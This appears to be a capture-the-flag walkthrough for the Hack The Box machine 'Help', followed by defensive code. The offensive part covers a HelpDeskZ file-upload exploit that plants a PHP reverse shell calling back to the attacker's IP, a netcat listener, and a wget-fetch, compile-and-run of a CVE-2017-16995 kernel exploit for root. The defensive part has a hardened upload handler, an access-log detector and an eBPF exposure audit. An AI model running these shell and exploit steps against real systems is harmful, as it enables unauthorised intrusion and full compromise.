Target IP: 10.129.230.159
Domain: help.htb
OS: Ubuntu 16.04 (Apache 2.4.18)
Difficulty: Easy
Author: [g1nt0n1c]
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
nmap -sV 10.129.230.159
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1
Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | Apache 2.4.18 (Ubuntu) | Default Apache page - web app likely mounted at a subdirectory |
| 3000/tcp | Node.js / Express | Returns raw JSON - likely a REST API |
1.2 Local Host Resolution
Add the target to /etc/hosts so hostname-based tools and the web app resolve correctly.
# Append the entry without overwriting the file
echo "10.129.230.159 help.htb" | sudo tee -a /etc/hosts
1.3 Directory Enumeration
Fuzz for hidden paths. The default Apache page suggests content is mounted under a subdirectory.
# Recursive content discovery with automatic depth control
feroxbuster --url http://help.htb
Key findings:
- http://help.htb/support - HelpdeskZ support portal
- http://help.htb/support/uploads - Upload storage for tickets
2. Phase 2: Vulnerability Analysis
2.1 Web Application Fingerprinting
Browsing to /support reveals HelpdeskZ - an open-source PHP help desk. Source code inspection reveals nothing useful, but the software is on GitHub.
Version identification via exposed README:
The GitHub repo (ViktorNova/HelpDeskZ) contains a README.md. Since the web server does not block access to that file, we can fetch it directly from the target.
http://help.htb/support/README.md
# => Version: 1.0.2 (released 1st June 2015)
2.2 Exploit Research
Search: "HelpdeskZ 1.0.2 exploit" → EDB-40300
Vulnerability: Unauthenticated arbitrary file upload. The app accepts .php files and renames them using md5(filename + time()) - security through obscurity that we can defeat by reconstructing the timestamp.
2.3 Adapting the Exploit for Python 3
The published PoC (40300.py) was written for Python 2. Three changes are needed:
| Issue | Old (Python 2) | Fixed (Python 3) |
|---|---|---|
| Print statements | print 'Helpdeskz...' | print('Helpdeskz...') |
| MD5 requires bytes | hashlib.md5(plaintext) | hashlib.md5(plaintext.encode()) |
| Unused import | import time | (remove) |
3. Phase 3: Initial Access (PHP Reverse Shell via File Upload)
3.1 Prepare the PHP Reverse Shell
Kali ships a ready-made PHP reverse shell. Copy it and edit the callback IP and port.
# Copy the shell to the current directory
cp /usr/share/webshells/php/php-reverse-shell.php .
Edit the file and set:
$ip = '10.10.16.149'; // Your tun0 IP (HTB VPN)
$port = 5555;
3.2 Upload the Shell
Navigate to the ticket submission form and attach the PHP file:
http://help.htb/support/?v=submit_ticket&action=displayForm
Fill in the required fields and upload php-reverse-shell.php. The server accepts it and stores it under uploads/tickets/.
The exact name is unknown to us - but not for long.
3.3 Start the Listener
Open a terminal and wait for the callback. rlwrap adds readline support (arrow keys, history) to the raw netcat session.
# -l: listen mode | -v: verbose | -n: no DNS | -p: port
rlwrap nc -lvnp 5555
3.4 Run the Exploit Script
The script reads the server’s Date response header to get the upload timestamp, then brute-forces backwards through 600 seconds to reconstruct the md5 filename and trigger the shell.
# Usage: python 40300.py <base_url> <filename>
python 40300.py http://help.htb/support/ php-reverse-shell.php
When the script finds a 200 OK, it prints the URL. Visit it in a browser or with curl - Apache executes the PHP file and your listener catches a shell as www-data.
3.5 Upgrade the Shell
The raw netcat shell has no TTY. Spawn a proper Bash session via Python’s pty module.
# Spawn a full interactive TTY inside the current process
python -c 'import pty;pty.spawn("/bin/bash")'
4. Phase 4: Privilege Escalation (Kernel Exploit - CVE-2017-16995)
4.1 Identify Kernel Vulnerabilities
Run Linux Exploit Suggester against the target’s kernel version to surface applicable exploits.
Key result:
[+] [CVE-2017-16995] eBPF_verifier
Tags: ubuntu=14.04|16.04|17.04
Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
Ubuntu 16.04 ships with an eBPF verifier bug that allows a local user to escalate to root. Full PoC: gugronnier/CVE-2017-16995
4.2 Download the Exploit (on Kali)
Fetch the C source for the exploit.
# Download the exploit source to Kali
wget https://raw.githubusercontent.com/Al1ex/LinuxEelvation/refs/heads/master/CVE-2017-16995/upstream44.c
4.3 Serve the File to the Target
Spin up a temporary HTTP server in the directory containing the exploit source.
# Serve the current directory on port 8000
python3 -m http.server
4.4 Transfer, Compile & Execute (on Target)
In the www-data shell, pull the source file down, compile it natively, and run it.
# Pull exploit source from Kali (replace IP with your tun0)
wget http://10.10.16.149:8000/upstream44.c
# Compile: -o sets the output binary name
gcc -o pwned upstream44.c
# Run the exploit
./pwned
4.5 Verify Root
whoami
# The prompt now reads root@help:/home/help#
Deep Dive: HelpDeskZ Arbitrary File Upload (EDB-40300)
The core flaw - security through obscurity:
HelpDeskZ performs no server-side validation of uploaded file types. A .php file is accepted and stored as-is. To prevent direct access, the app renames it using:
md5(original_filename + time())
This hides the URL, but the file remains executable PHP on Apache. The only protection is that the attacker doesn’t know the name.
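To make the two halves of the flaw concrete, here is an added example (not HelpDeskZ's code) that places the naming scheme described above beside a hardened upload handler. The allowlist, the storage directory and the function names are assumptions for illustration; the hardened version drops the client-supplied name entirely, derives the stored name from a CSPRNG instead of the clock, and writes outside the web root so Apache has no path at which to execute the file.

```python
# Added example, not HelpDeskZ's own code. Names, allowlist and paths are assumptions.
import hashlib
import os
import secrets
import tempfile
from pathlib import Path

# Assumed allowlist: only harmless attachment types survive the final-suffix check.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".png", ".jpg", ".jpeg"}


def weak_upload_name(original_filename, unix_time):
    """The scheme the write-up describes: md5(filename + time()) with the original
    extension kept. Both inputs are public (the filename is attacker-chosen, the time
    is readable from the Date header), so the 'hidden' name is fully determined."""
    ext = Path(original_filename).suffix
    return hashlib.md5(f"{original_filename}{unix_time}".encode()).hexdigest() + ext


def hardened_store(original_filename, data, upload_dir):
    """Defender-side handling. Only the final suffix is taken from the client name and
    it must be allowlisted; the stored name is random, so no inner extension such as
    'x.php.txt' survives and nothing about the name can be reconstructed."""
    suffix = Path(original_filename).suffix.lower()
    if suffix not in ALLOWED_EXTENSIONS:
        raise ValueError(f"extension {suffix!r} not allowed")
    dest = Path(upload_dir) / (secrets.token_hex(16) + suffix)
    # upload_dir is assumed to live outside the web root (e.g. /var/lib/helpdesk/uploads)
    # so the file is served, if at all, through a download handler, never by Apache directly.
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)  # never overwrite
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest


def demo():
    """Runs both paths on constructed input and reports what a reviewer would check."""
    with tempfile.TemporaryDirectory() as tmp:
        first = hardened_store("report.txt", b"ticket attachment", tmp)
        second = hardened_store("report.txt", b"ticket attachment", tmp)
        try:
            hardened_store("php-reverse-shell.php", b"<?php /* constructed */ ?>", tmp)
            php_rejected = False
        except ValueError:
            php_rejected = True
        return {
            # same filename + same timestamp -> same name, every time
            "weak_deterministic": weak_upload_name("php-reverse-shell.php", 1700000000)
            == weak_upload_name("php-reverse-shell.php", 1700000000),
            # same filename uploaded twice -> unrelated random names
            "hardened_unique": first.name != second.name,
            "php_rejected": php_rejected,
        }


if __name__ == "__main__":
    print(demo())
```

The allowlist alone is not enough on its own: an Apache vhost that maps `.php` with AddHandler can still interpret multi-extension names, which is why the hardened path discards the client name rather than sanitising it, and why the storage directory sits outside the document root.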
How we defeated the obfuscation:
- The HTTP Date response header exposes the server's current Unix timestamp.
- We know the original filename (php-reverse-shell.php).
- The upload and the script's HEAD requests happen within seconds of each other.
- The exploit iterates backwards over 600 timestamps, computing md5(filename + t) for each and issuing a HEAD request to uploads/tickets/<hash>.php.
- A 200 OK means we found the live URL - visiting it triggers the shell.
In short: the server’s own clock, readable from response headers, is all the information needed to reconstruct the “secret” filename.
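The enumeration just described leaves a loud trace in the Apache access log: one client issuing hundreds of HEAD requests to uploads/tickets/<32 hex>.<ext> in a few seconds, almost all answered 404, followed by a single 200. The following is an added detection example (not part of the original write-up or the HelpDeskZ project) that parses combined-format log lines and raises an alert per source IP once the probe count crosses a threshold, escalating when any probe succeeded. The log lines, IPs, threshold and path prefix are constructed for the example.

```python
# Added example: detection logic over constructed Apache combined-format log lines.
# The threshold, IPs and path prefix are assumptions, not values from the write-up.
import hashlib
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# An md5 hex name under the ticket upload directory, any extension.
PROBE_RE = re.compile(r"^/support/uploads/tickets/[0-9a-f]{32}\.[A-Za-z0-9]+$")


def constructed_log():
    """Builds sample traffic: one benign visitor, then a probe burst from one client."""
    lines = ['10.10.14.7 - - [20/Mar/2025:10:00:00 +0000] "GET /support/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"']
    for i in range(25):  # 25 guesses that miss
        h = hashlib.md5(f"constructed-probe-{i}".encode()).hexdigest()
        lines.append(
            f'10.10.16.149 - - [20/Mar/2025:10:00:{i:02d} +0000] '
            f'"HEAD /support/uploads/tickets/{h}.php HTTP/1.1" 404 - "-" "python-requests/2.31"'
        )
    h = hashlib.md5(b"constructed-hit").hexdigest()
    lines.append(  # the guess that lands
        f'10.10.16.149 - - [20/Mar/2025:10:00:30 +0000] '
        f'"HEAD /support/uploads/tickets/{h}.php HTTP/1.1" 200 - "-" "python-requests/2.31"'
    )
    lines.append(  # and the follow-up GET that would execute the file
        f'10.10.16.149 - - [20/Mar/2025:10:00:31 +0000] '
        f'"GET /support/uploads/tickets/{h}.php HTTP/1.1" 200 0 "-" "curl/8.0"'
    )
    return lines


def detect_upload_bruteforce(lines, threshold=20):
    """Returns one alert dict per source IP whose probe count reaches the threshold.
    A probe is any request for an md5-named file under the upload directory; a 200
    on such a path is recorded as a hit and raises the severity to critical."""
    stats = defaultdict(lambda: {"probes": 0, "not_found": 0, "hits": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not PROBE_RE.match(m["path"]):
            continue
        s = stats[m["ip"]]
        s["probes"] += 1
        if m["status"] == "404":
            s["not_found"] += 1
        elif m["status"] == "200":
            s["hits"].append((m["method"], m["path"]))
    alerts = []
    for ip, s in stats.items():
        if s["probes"] >= threshold:
            alerts.append({
                "ip": ip,
                "probes": s["probes"],
                "not_found": s["not_found"],
                "hits": s["hits"],
                "severity": "critical" if s["hits"] else "high",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_upload_bruteforce(constructed_log()):
        print(alert)
```

In production the same rule is easy to express in any log pipeline: group by client IP over a one-minute window, count requests matching the upload-directory pattern, and page on the first 200 in the group, because that is the moment the uploaded file was located and, on the next GET, executed.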
Deep Dive: CVE-2017-16995 - eBPF Verifier Privilege Escalation
Affected kernels: Linux 4.4–4.14 (Ubuntu 14.04 / 16.04 / 17.04)
The Linux kernel’s eBPF (extended Berkeley Packet Filter) subsystem allows unprivileged users to submit small programs for the kernel to run. A verifier is supposed to ensure these programs cannot access arbitrary memory. A sign-extension bug in the verifier allowed a crafted eBPF program to bypass the checks and write to kernel memory - leading to a full root escalation.
Pre-conditions:
- CONFIG_BPF_SYSCALL must be enabled (default on Ubuntu).
- kernel.unprivileged_bpf_disabled must not be set to 1.
Both conditions are met on a stock Ubuntu 16.04 install, making this box straightforwardly exploitable with a public PoC.
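The two pre-conditions are exactly what an administrator should audit on a fleet. The following is an added example (not from the write-up or from any of the PoC repositories) that evaluates them from the kernel's own sources of truth: /proc/sys/kernel/unprivileged_bpf_disabled for the sysctl and /boot/config-<release> for the build option. The pure function takes both values as strings so it can be tested on constructed input; live_check() reads them from the host it runs on. Treating a value of 2 as blocked is my addition (newer kernels use 2 for "disabled, but can be re-enabled"); the write-up only mentions 1.

```python
# Added example: audit the CVE-2017-16995 pre-conditions the write-up lists.
# File paths are the standard Linux locations; the function names are assumptions.
import os
import re
from pathlib import Path


def bpf_exposure(unprivileged_bpf_disabled, kconfig_text):
    """Returns (exposed, reason). Exposed means an unprivileged local user can reach
    the bpf() syscall, which is the entry point the verifier bug needs."""
    if not re.search(r"^CONFIG_BPF_SYSCALL=y$", kconfig_text, re.M):
        return False, "CONFIG_BPF_SYSCALL not enabled: bpf() syscall is not compiled in"
    value = (unprivileged_bpf_disabled or "").strip()
    # 1 = disabled until reboot (cannot be flipped back); 2 = disabled but re-enableable
    # (added in later kernels, an assumption beyond what the write-up states).
    if value in ("1", "2"):
        return False, f"kernel.unprivileged_bpf_disabled={value}: unprivileged bpf() blocked"
    return True, f"kernel.unprivileged_bpf_disabled={value!r}: unprivileged users can load eBPF programs"


def live_check(sysctl_path="/proc/sys/kernel/unprivileged_bpf_disabled", kconfig_path=None):
    """Reads the real values from this host. Missing files are reported, not guessed."""
    if kconfig_path is None:
        kconfig_path = f"/boot/config-{os.uname().release}"
    sysctl_file, kconfig_file = Path(sysctl_path), Path(kconfig_path)
    if not kconfig_file.exists():
        return {"exposed": None, "reason": f"{kconfig_path} not readable; cannot confirm CONFIG_BPF_SYSCALL"}
    if not sysctl_file.exists():
        # The sysctl appeared with kernel 4.4; its absence on older kernels means bpf()
        # cannot be restricted this way at all, so report it rather than assume.
        return {"exposed": None, "reason": f"{sysctl_path} missing; sysctl unsupported on this kernel"}
    exposed, reason = bpf_exposure(sysctl_file.read_text(), kconfig_file.read_text())
    return {"exposed": exposed, "reason": reason, "release": os.uname().release}


if __name__ == "__main__":
    print(live_check())
```

The sysctl only narrows the attack surface; the actual fix for CVE-2017-16995 is the vendor kernel update. Until that is applied, `sysctl -w kernel.unprivileged_bpf_disabled=1` (persisted under /etc/sysctl.d/) removes the unprivileged path the Linux Exploit Suggester entry above flags, and the script reports the box as no longer exposed once that value reads 1.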